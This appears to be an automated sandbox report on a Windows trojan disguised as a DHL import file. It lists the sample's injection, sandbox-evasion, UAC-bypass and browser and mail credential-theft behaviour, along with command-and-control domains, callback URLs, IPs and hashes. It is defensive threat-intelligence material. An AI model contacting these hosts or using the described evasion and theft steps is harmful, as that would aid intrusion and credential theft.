                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1547007 Sample: DHL_IMPORT_8236820594.exe Startdate: 01/11/2024 Architecture: WINDOWS Score: 100 30 www.iuyi542.xyz 2->30 32 www.vrxlzluy.shop 2->32 34 13 other IPs or domains 2->34 46 Suricata IDS alerts for network traffic 2->46 48 Antivirus / Scanner detection for submitted sample 2->48 50 Multi AV Scanner detection for submitted file 2->50 54 4 other signatures 2->54 10 DHL_IMPORT_8236820594.exe 1 2->10         started        signatures3 52 Performs DNS queries to domains with low reputation 30->52 process4 signatures5 66 Binary is likely a compiled AutoIt script file 10->66 68 Found API chain indicative of sandbox detection 10->68 70 Writes to foreign memory regions 10->70 72 2 other signatures 10->72 13 svchost.exe 10->13         started        process6 signatures7 74 Maps a DLL or memory area into another process 13->74 16 AUHJGnjYgKTjWw.exe 13->16 injected process8 signatures9 42 Windows Update Standalone Installer command line found (may be used to bypass UAC) 16->42 44 Found direct / indirect Syscall (likely to bypass EDR) 16->44 19 net.exe 13 16->19         started        22 wusa.exe 16->22         started        process10 signatures11 56 Tries to steal Mail credentials (via file / registry access) 19->56 58 Tries to harvest and steal browser information (history, passwords, etc) 19->58 60 Modifies the context of a thread in another process (thread injection) 19->60 62 3 other signatures 19->62 24 AUHJGnjYgKTjWw.exe 19->24 injected 28 firefox.exe 19->28         started        process12 dnsIp13 36 www.harmonid.life 203.161.49.193, 50032, 50033, 80 VNPT-AS-VNVNPTCorpVN Malaysia 24->36 38 wcp95.top 154.23.184.95, 49981, 49996, 50011 COGENT-174US United States 24->38 40 7 other IPs or domains 24->40 64 Found direct / indirect Syscall (likely to bypass EDR) 24->64 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                DHL_IMPORT_8236820594.exe63%ReversingLabsWin32.Trojan.AutoitInject
                DHL_IMPORT_8236820594.exe100%AviraDR/AutoIt.Gen8
                DHL_IMPORT_8236820594.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                https://getbootstrap.com/)0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                trifecta.center
                		3.33.130.190
                		truetrue
                  		unknown
                  wcp95.top
                  		154.23.184.95
                  		truetrue
                    		unknown
                    wddb97.top
                    		206.119.82.172
                    		truetrue
                      		unknown
                      www.gokulmohan.online
                      		172.67.185.22
                      		truetrue
                        		unknown
                        www.harmonid.life
                        		203.161.49.193
                        		truetrue
                          		unknown
                          roopiedutech.online
                          		103.191.208.137
                          		truetrue
                            		unknown
                            iuyi542.xyz
                            		38.47.237.27
                            		truetrue
                              		unknown
                              www.vrxlzluy.shop
                              		188.114.96.3
                              		truetrue
                                		unknown
                                www.comvq.fun
                                		3.111.160.216
                                		truetrue
                                  		unknown
                                  www.wcp95.top
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.iuyi542.xyz
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.wddb97.top
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.trifecta.center
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.roopiedutech.online
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.xtelify.tech
                                            		unknown
                                            		unknownfalse
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.iuyi542.xyz/b6lw/?XbDhGVR=FO9SkkJ/zSkBY2gKE3XjGE22XLVH89fAFT5UFdCZW5l7B5PRw+4+Jbotmp48rM/okqGzRuEUvPhZhQzUiZGHGB1tKbDdMwj50dTtgpwp3v/R5pIWGJdc6oQ=&Qz=BJvp0BdhxXiTCTGPfalse
                                                		unknown
                                                http://www.wddb97.top/a3g3/true
                                                  		unknown
                                                  http://www.vrxlzluy.shop/o91n/?XbDhGVR=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rus+09XFbP+3c72g6WMTcCeHGHsKE18csM01zHbC+82zyOO8bx37pnUbuImGHRIRsUOfuHIGVgprfqSQRJiadd1v3E=&Qz=BJvp0BdhxXiTCTGPtrue
                                                    		unknown
                                                    http://www.trifecta.center/3c6w/?XbDhGVR=FJ83cOvFWEccIB8Y6SCsBqJgMlFSJUXICv/nsL67hA7PUBbPcYUeOgrdyaqmH9Z1A+LVMRCMzG0eJtFhxlj35v5UnzdVcRI8ETGcI3l1N4u34k5Wtd8PhNs=&Qz=BJvp0BdhxXiTCTGPtrue
                                                      		unknown
                                                      http://www.vrxlzluy.shop/o91n/true
                                                        		unknown
                                                        http://www.harmonid.life/aq3t/true
                                                          		unknown
                                                          http://www.wcp95.top/rj0s/true
                                                            		unknown
                                                            http://www.wcp95.top/rj0s/?XbDhGVR=wwfrpq2GStq8yXhruzchqPI2DPKMclx/34kF3CMx+1v+TSw3PCRza/Sx++Q9wxTideP8HMqKtaf0MdZtX7Zp7/WG/Y2BEJVTn7MuHEHfS2P/6TB7VaKsbng=&Qz=BJvp0BdhxXiTCTGPtrue
                                                              		unknown
                                                              http://www.gokulmohan.online/xh7d/?XbDhGVR=lbj31sdPKdIucqFOkkGE3KM3+04tAjUV11hc/ilEwtgrKZz4woi/xCbjO8SSPcCwKsmvKoPyP7HvBY60bpiIs0q+jugQSLxZIHi4ORfVnf3fP4vxqk9k0cQ=&Qz=BJvp0BdhxXiTCTGPtrue
                                                                		unknown
                                                                http://www.roopiedutech.online/3m9t/?XbDhGVR=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHiHBruo5ppO8xHCx+tj/iffFnkB/SDXcvjAJfIbSWg6DSwwu1sipuRv+U7XkBw=&Qz=BJvp0BdhxXiTCTGPtrue
                                                                  		unknown
                                                                  http://www.roopiedutech.online/3m9t/true
                                                                    		unknown
                                                                    http://www.trifecta.center/3c6w/true
                                                                      		unknown
                                                                      http://www.comvq.fun/aajw/true
                                                                        		unknown
                                                                        http://www.comvq.fun/aajw/?Qz=BJvp0BdhxXiTCTGP&XbDhGVR=lJ+qR9qEWHtEYfdYXX38H63zdICQzTmBsURfekuXE7iDW/5kFwCD5SzXO8//IXYeWe3pPDw5e3u+RAlULoDse9ZEd7r2QSdjEk66OCO0EG57H2Th8v5BKcw=true
                                                                          		unknown
                                                                          http://www.gokulmohan.online/xh7d/true
                                                                            		unknown

                                                                            URLs from Memory and Binaries

                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                            https://duckduckgo.com/chrome_newtabnet.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://vrxlzluy.shop/o91n/?XbDhGVR=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rusnet.exe, 00000007.00000002.3519002309.0000000003A56000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.0000000003106000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://duckduckgo.com/ac/?q=net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.iconet.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://www.harmonid.lifeAUHJGnjYgKTjWw.exe, 00000009.00000002.3520205826.0000000005026000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://getbootstrap.com/)net.exe, 00000007.00000002.3519002309.00000000038C4000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.0000000002F74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2418472075.000000001FFB4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://www.ecosia.org/newtab/net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://ac.ecosia.org/autocomplete?q=net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://roopiedutech.online/3m9t/?XbDhGVR=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHinet.exe, 00000007.00000002.3519002309.00000000043C2000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.0000000003A72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnet.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://github.com/twbs/bootstrap/blob/master/LICENSE)net.exe, 00000007.00000002.3519002309.00000000038C4000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.0000000002F74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2418472075.000000001FFB4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://www.gokulmohan.online/xh7d/?XbDhGVR=lbj31sdPKdIucqFOkkGE3KM3net.exe, 00000007.00000002.3519002309.0000000003F0C000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.00000000035BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		unknown

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        206.119.82.172
                                                                                        		wddb97.topUnited States
                                                                                        		174COGENT-174UStrue
                                                                                        38.47.237.27
                                                                                        		iuyi542.xyzUnited States
                                                                                        		174COGENT-174UStrue
                                                                                        203.161.49.193
                                                                                        		www.harmonid.lifeMalaysia
                                                                                        		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                        188.114.96.3
                                                                                        		www.vrxlzluy.shopEuropean Union
                                                                                        		13335CLOUDFLARENETUStrue
                                                                                        103.191.208.137
                                                                                        		roopiedutech.onlineunknown
                                                                                        		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                        3.111.160.216
                                                                                        		www.comvq.funUnited States
                                                                                        		16509AMAZON-02UStrue
                                                                                        154.23.184.95
                                                                                        		wcp95.topUnited States
                                                                                        		174COGENT-174UStrue
                                                                                        3.33.130.190
                                                                                        		trifecta.centerUnited States
                                                                                        		8987AMAZONEXPANSIONGBtrue
                                                                                        172.67.185.22
                                                                                        		www.gokulmohan.onlineUnited States
                                                                                        		13335CLOUDFLARENETUStrue

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1547007
                                                                                        Start date and time:2024-11-01 19:41:55 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 9m 8s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Run name:Run with higher sleep bypass
                                                                                        Number of analysed new started processes analysed:10
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:2
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:DHL_IMPORT_8236820594.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@9/2@10/9
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 75%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 95%
                                                                                        • Number of executed functions: 44
                                                                                        • Number of non-executed functions: 306
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target AUHJGnjYgKTjWw.exe, PID 6016 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: DHL_IMPORT_8236820594.exe

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        14:44:08API Interceptor5509102x Sleep call for process: net.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        206.119.82.172Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.d97fw.top/07qt/
                                                                                        RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.d97fw.top/j0mp/
                                                                                        203.161.49.193Statement Cargomind 2024-09-12 (K07234).exeGet hashmaliciousFormBookBrowse
                                                                                        • www.fitlifa.xyz/6tsn/
                                                                                        Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.simplek.top/ep69/
                                                                                        Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.simplek.top/ep69/
                                                                                        SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.futurevision.life/hxmz/
                                                                                        Udspecialiser45.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • www.funtechie.top/udud/
                                                                                        qEW7hMvyV7.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.winnov8.top/abt9/
                                                                                        PR44238-43433.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.innovtech.life/nq8t/
                                                                                        RFQ-9877678-9988876509886546887.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.innovtech.life/nq8t/
                                                                                        RFQ-9877678-9988876509886546884.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.innovtech.life/nq8t/
                                                                                        Bootblacks.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • www.funtechie.top/udud/
                                                                                        188.114.96.3rQUOTATION_NOVQTRA071244__PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • filetransfer.io/data-package/8Koz7PwT/download
                                                                                        PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                        • e3z1.shop/HT341/index.php
                                                                                        NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.timizoasisey.shop/3p0l/
                                                                                        FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.bayarcepat19.click/5hcm/
                                                                                        greenthingswithgreatnewsforgetmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                        • paste.ee/d/sTNna
                                                                                        Lana_Rhoades_Photoos.jsGet hashmaliciousUnknownBrowse
                                                                                        • paste.ee/d/ciuNW
                                                                                        PO-000172483 (2).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • www.launchdreamidea.xyz/2b9b/
                                                                                        VfKk5EmvwW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 083098cm.n9shteam.in/vmBase.php
                                                                                        Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • filetransfer.io/data-package/CEqTVkxM/download
                                                                                        0JLWNg4Sz1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 977255cm.nyashkoon.in/secureWindows.php

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        www.gokulmohan.onlineFACTURA A-7507_H1758.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 104.21.64.124
                                                                                        www.comvq.funmm.exeGet hashmaliciousUnknownBrowse
                                                                                        • 3.111.160.216

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                        • 188.114.96.3
                                                                                        https://docsend.com/view/yvdhrcvq4c4p7xrdGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.24.14
                                                                                        https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/william.ferebee@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.25.14
                                                                                        rQUOTATION_NOVQTRA071244__PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 188.114.96.3
                                                                                        https://issuu.com/mathildagr/docs/pmd9746827?fr=sZTMyNjc4NzAyNzMGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.24.14
                                                                                        DMv89K955Y.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC StealerBrowse
                                                                                        • 104.21.33.140
                                                                                        Setup.exeGet hashmaliciousUnknownBrowse
                                                                                        • 1.1.1.1
                                                                                        iIDqizT3Wx.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.33.140
                                                                                        hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                                                        • 104.26.0.231
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                        • 188.114.97.3
                                                                                        COGENT-174USdraft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                        • 38.47.232.160
                                                                                        VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                                                        • 154.7.176.67
                                                                                        NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                        • 38.88.82.56
                                                                                        71Ah2iqq3g.dllGet hashmaliciousAmadeyBrowse
                                                                                        • 45.93.20.135
                                                                                        71Ah2iqq3g.dllGet hashmaliciousAmadeyBrowse
                                                                                        • 45.93.20.135
                                                                                        1nnlXctdko.dllGet hashmaliciousAmadeyBrowse
                                                                                        • 45.93.20.135
                                                                                        HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                                        • 154.23.181.7
                                                                                        18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                                        • 38.88.82.56
                                                                                        WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • 38.88.82.56
                                                                                        bszYGSIHuU.exeGet hashmaliciousUnknownBrowse
                                                                                        • 38.180.123.95
                                                                                        COGENT-174USdraft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                        • 38.47.232.160
                                                                                        VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                                                        • 154.7.176.67
                                                                                        NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                        • 38.88.82.56
                                                                                        71Ah2iqq3g.dllGet hashmaliciousAmadeyBrowse
                                                                                        • 45.93.20.135
                                                                                        71Ah2iqq3g.dllGet hashmaliciousAmadeyBrowse
                                                                                        • 45.93.20.135
                                                                                        1nnlXctdko.dllGet hashmaliciousAmadeyBrowse
                                                                                        • 45.93.20.135
                                                                                        HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                                        • 154.23.181.7
                                                                                        18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                                        • 38.88.82.56
                                                                                        WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • 38.88.82.56
                                                                                        bszYGSIHuU.exeGet hashmaliciousUnknownBrowse
                                                                                        • 38.180.123.95
                                                                                        VNPT-AS-VNVNPTCorpVNStatement Cargomind 2024-09-12 (K07234).exeGet hashmaliciousFormBookBrowse
                                                                                        • 203.161.49.193
                                                                                        Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                        • 203.161.49.193
                                                                                        Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                        • 203.161.49.193
                                                                                        wZU2edEGL3.elfGet hashmaliciousUnknownBrowse
                                                                                        • 113.178.195.24
                                                                                        B6eg13TpEH.elfGet hashmaliciousUnknownBrowse
                                                                                        • 113.178.122.51
                                                                                        jew.x86.elfGet hashmaliciousMiraiBrowse
                                                                                        • 113.166.50.124
                                                                                        jew.mips.elfGet hashmaliciousMiraiBrowse
                                                                                        • 113.160.104.193
                                                                                        jew.spc.elfGet hashmaliciousMiraiBrowse
                                                                                        • 14.245.79.86
                                                                                        jew.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                        • 14.188.62.1
                                                                                        la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                        • 113.179.13.83

                                                                                        JA3 Fingerprints

                                                                                        No context

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Temp\0342HZ6P1r

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\net.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):114688
                                                                                        Entropy (8bit):0.9746603542602881
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\unprickly

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):289280
                                                                                        Entropy (8bit):7.991340730173181
                                                                                        Encrypted:true
                                                                                        SSDEEP:6144:NgvzoZFqDvBeVTAwh8myPJ6AXaT1N9ALSP+TGd7EdB:mzoZVV0tmyPZaTT+iq/
                                                                                        MD5:209009BA6035082F8D90CB12853569DA
                                                                                        SHA1:68F3132079050C772B5F8DD16988697AE256CC3D
                                                                                        SHA-256:7C25AED06B720A18735AA50CEBBD098150542AC3A18E8A881E74A56A8B3CAC60
                                                                                        SHA-512:EB3ABC943F8F2434CB9E75DB076EA9247E05581BC0DF65AED46C27BBD4FEE16F9ECDA8BF2C9CE3A185309E161B38B87EA809610162F3A7AEABC12A9D9D9A93AD
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:t....RNMD...L...r.DL...bMC...DOM9EJNKRNMDOM9EJNKRNMDOM9EJNK.NMDAR.KJ.B.o.E...."'8r>?+(?X(j-*< "0o/\e8;%r'#d..je'!/7`@IEi9EJNKRN4EF..%-.v2).y/*._..h.*.U.v.,.T..qY".."1&p$(.9EJNKRNM..M9.KOK....OM9EJNKR.MFNF8NJN.VNMDOM9EJN.FNMD_M9E:JKRN.DO]9EJLKRHMDOM9EJHKRNMDOM95NNKPNMDOM9GJ..RN]DO]9EJN[RN]DOM9EJ^KRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJ`?769DOM..NNKBNMD.I9EZNKRNMDOM9EJNKRnMD/M9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDOM9EJNKRNMDO

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):7.431456956182069
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:DHL_IMPORT_8236820594.exe
                                                                                        File size:1'632'256 bytes
                                                                                        MD5:2f01c94df712e58b8227588ba7a376c6
                                                                                        SHA1:05b93bdaf9c8bdb42e6888e2f1d292ad1b9bc908
                                                                                        SHA256:5a8b2ff82ebbee4b3d5baf85be0af29029669da8c2cde057affaca52c5c94fc0
                                                                                        SHA512:3f4447e0788a35e9c0468e376dc7872a2d9b119bb0ae35333c3393c78572d2155656e3bbb33f5817ceacdffbfaee75e47937fe6702ef2018ba67ce43f73a4784
                                                                                        SSDEEP:24576:IqDEvCTbMWu7rQYlBQcBiT6rprG8abzTeL2pAMdIFLleODoCGDYKmMOlsVF:ITvC/MTQYxsWR7abPeSpAaI/aYKmMO
                                                                                        TLSH:7A75E00273D1C062FFAB92334B5AE6514BBC6A260123E51F13981DBAFD705B1563E7A3
                                                                                        File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                                        File Icon

                                                                                        Icon Hash:aaf3e3e3938382a0

                                                                                        Static PE Info

                                                                                        General

